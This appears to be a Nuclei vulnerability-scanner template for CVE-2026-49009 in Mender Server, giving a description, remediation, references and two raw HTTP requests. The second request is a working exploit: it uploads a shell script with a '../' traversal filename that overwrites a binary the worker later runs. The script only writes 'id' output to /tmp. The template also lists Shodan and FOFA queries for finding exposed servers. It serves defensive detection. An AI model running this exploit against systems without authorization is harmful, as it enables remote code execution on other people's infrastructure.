id: CVE-2026-49009 info: name: Mender Server - Authenticated Path Traversal to RCE author: j0xh-sec, inteleon404 severity: critical description: | Mender Server versions 4.1.0, 4.0.1, and below are vulnerable to an authenticated path traversal in the single-file artifact generation API endpoint. An attacker with a valid user account can supply a filename containing `../` traversal sequences (e.g. `../../../../usr/bin/mender-artifact`), causing the uploaded file payload to be written outside the intended directory. When the create-artifact-worker workflow later invokes the overwritten binary, the attacker's injected command is executed within the worker container, achieving remote code execution. The flaw was fixed in Mender Server 4.1.1 (stable) and 4.0.2 (LTS) by hardening input validation in the single-file generation handler. impact: | Successful exploitation gives an authenticated attacker remote code execution inside the create-artifact-worker container. In multi-tenant Hosted Mender environments this can compromise artifacts belonging to other organizations sharing the same infrastructure. remediation: | Upgrade to Mender Server 4.1.1, 4.0.2, or later. Affected versions include all releases prior to and including 4.1.0 and 4.0.1 for both Mender Server Community (Open Source) and Mender Server Enterprise. reference: - https://nvd.nist.gov/vuln/detail/CVE-2026-49009 - https://mender.io/blog/cve-2026-49009-cve-2026-33552-input-sanitization-and-access-control-issues-in-mender-server - https://app.opencve.io/cve/CVE-2026-49009 - https://www.tenable.com/cve/CVE-2026-49009 - https://docs.mender.io/release-information/release-notes-changelog/mender-server - https://docs.mender.io/release-information/release-notes-changelog/mender-server-enterprise classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H cvss-score: 9.9 cve-id: CVE-2026-49009 cwe-id: CWE-22 epss-score: 0.00180 epss-percentile: 0.59645 cpe: cpe:2.3:a:northern.tech:mender_server:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: northern.tech product: mender_server shodan-query: http.title:"Mender" fofa-query: app="Mender" tags: cve,cve2026,mender,path-traversal,rce,authenticated,intrusive http: - raw: - |+ POST /api/management/v1/useradm/auth/login HTTP/1.1 Host: {{Hostname}} Content-Type: application/json Authorization: Basic {{base64('{{username}}:{{password}}')}} {} - |+ POST /api/management/v1/deployments/artifacts/generate HTTP/1.1 Host: {{Hostname}} Authorization: Bearer {{jwt}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr}} ------WebKitFormBoundary{{randstr}} Content-Disposition: form-data; name="name" cve-poc-{{randhex_6}} ------WebKitFormBoundary{{randstr}} Content-Disposition: form-data; name="description" CVE-2026-49009 verification ------WebKitFormBoundary{{randstr}} Content-Disposition: form-data; name="type" single-file ------WebKitFormBoundary{{randstr}} Content-Disposition: form-data; name="device_types_compatible" qemu ------WebKitFormBoundary{{randstr}} Content-Disposition: form-data; name="args" Content-Type: application/json {"filename":"../../../../usr/bin/mender-artifact","dest_dir":"/opt/mender/app","software_name":"demo","software_version":"1"} ------WebKitFormBoundary{{randstr}} Content-Disposition: form-data; name="file"; filename="payload.sh" Content-Type: application/octet-stream #!/bin/sh /usr/bin/id>/tmp/.cve-2026-49009 ------WebKitFormBoundary{{randstr}}-- extractors: - type: regex name: jwt part: body internal: true regex: - "([A-Za-z0-9_\\-]+\\.[A-Za-z0-9_\\-]+\\.[A-Za-z0-9_\\-]+)" matchers: - type: dsl dsl: - 'status_code_1 == 200' - 'len(jwt) > 100' - 'status_code_2 >= 200 && status_code_2 < 300' - 'contains(to_string(header_2_all), "Location")' condition: and